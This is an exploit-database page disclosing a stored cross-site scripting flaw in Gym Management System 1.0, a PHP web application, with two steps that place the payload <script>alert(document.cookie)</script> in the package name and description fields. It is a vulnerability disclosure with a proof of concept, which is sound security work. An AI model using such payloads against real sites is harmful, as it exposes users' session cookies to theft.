Gym management system 1.0 stored cross site scripting Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2020-10-23 |
Type : webapps |
Platform : php
This exploit / vulnerability Gym management system 1.0 stored cross site scripting is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Gym Management System 1.0 - Stored Cross Site Scripting
# Date: 21/10/2020
# Exploit Author: Jyotsna Adhana
# Vendor Homepage: https://www.sourcecodester.com/php/14541/gym-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14541&title=Gym+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
Step 1: Open the URL http://localhost/gym/gym/index.php?page=packages
Step 2: use payload <script>alert(document.cookie)</script> in Package Name and Description field